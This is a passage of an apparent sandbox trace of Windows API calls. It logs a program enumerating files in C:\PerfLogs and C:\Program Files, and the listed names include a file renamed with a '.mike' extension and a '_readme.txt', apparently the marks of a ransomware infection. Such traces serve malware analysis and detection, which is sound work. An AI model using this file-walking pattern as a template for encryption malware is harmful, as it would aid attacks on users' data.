ftCreationTime.dwLowDateTime=0x80711960, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80711960, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468ee660, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb80800, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisiorWW.msi", cAlternateFileName="")) returned 1 [0042.024] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe338d2c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe338d2c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe33ff6e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2440, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisiorWW.xml.mike", cAlternateFileName="VISIOR~1.MIK")) returned 1 [0042.024] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3341000, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3341000, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe33ff6e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0042.024] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3341000, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3341000, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe33ff6e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0042.024] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0042.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0042.024] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\.", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs", lpFilePart=0x0) returned 0xb [0042.024] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0042.024] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.024] CoTaskMemFree (pv=0x4fe370) [0042.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0042.025] GetFullPathNameW (in: lpFileName="C:\\PerfLogs", nBufferLength=0x105, lpBuffer=0x2aedfc, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs", lpFilePart=0x0) returned 0xb [0042.025] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af2c4) returned 1 [0042.025] GetFullPathNameW (in: lpFileName="C:\\PerfLogs", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs", lpFilePart=0x0) returned 0xb [0042.025] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\", nBufferLength=0x105, lpBuffer=0x2aeda0, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\", lpFilePart=0x0) returned 0xc [0042.025] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x2aefec | out: lpFindFileData=0x2aefec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.025] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.025] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0042.025] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 0 [0042.026] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af284) returned 1 [0042.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af290) returned 1 [0042.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af2c4) returned 1 [0042.026] GetFullPathNameW (in: lpFileName="C:\\PerfLogs", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs", lpFilePart=0x0) returned 0xb [0042.026] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\", nBufferLength=0x105, lpBuffer=0x2aeda0, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\", lpFilePart=0x0) returned 0xc [0042.026] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x2aefec | out: lpFindFileData=0x2aefec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.026] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.026] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0042.026] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0042.026] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af284) returned 1 [0042.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af290) returned 1 [0042.027] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin", lpFilePart=0x0) returned 0x11 [0042.027] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0042.027] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.027] CoTaskMemFree (pv=0x4fe370) [0042.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0042.027] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin", lpFilePart=0x0) returned 0x11 [0042.027] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0042.027] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin", lpFilePart=0x0) returned 0x11 [0042.027] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin\\", lpFilePart=0x0) returned 0x12 [0042.027] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.027] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.028] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0042.028] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0042.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0042.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0042.028] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin", lpFilePart=0x0) returned 0x11 [0042.028] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin\\", lpFilePart=0x0) returned 0x12 [0042.028] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.028] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.028] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0042.029] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0042.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0042.029] GetFullPathNameW (in: lpFileName="C:\\Program Files\\.", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files", lpFilePart=0x0) returned 0x10 [0042.029] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0042.029] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.029] CoTaskMemFree (pv=0x4fe370) [0042.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0042.029] GetFullPathNameW (in: lpFileName="C:\\Program Files", nBufferLength=0x105, lpBuffer=0x2aedfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files", lpFilePart=0x0) returned 0x10 [0042.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af2c4) returned 1 [0042.029] GetFullPathNameW (in: lpFileName="C:\\Program Files", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files", lpFilePart=0x0) returned 0x10 [0042.029] GetFullPathNameW (in: lpFileName="C:\\Program Files\\", nBufferLength=0x105, lpBuffer=0x2aeda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\", lpFilePart=0x0) returned 0x11 [0042.029] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x2aefec | out: lpFindFileData=0x2aefec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd7569640, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd7569640, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.030] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd7569640, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd7569640, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.030] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0042.030] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0042.030] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9ef07a9b, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9ef07a9b, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0042.030] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0042.030] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0042.031] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd0007960, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd0007960, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0042.031] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xcff6f3e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xcff6f3e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft SQL Server Compact Edition", cAlternateFileName="MICROS~3")) returned 1 [0042.031] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd0007960, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd0007960, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Sync Framework", cAlternateFileName="MICROS~4")) returned 1 [0042.031] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xcfcc1b20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xcfcc1b20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Synchronization Services", cAlternateFileName="MID7C0~1")) returned 1 [0042.031] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0042.031] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0042.032] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xd0007960, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd0007960, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0042.032] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0042.032] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 1 [0042.032] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0042.032] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0042.032] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, 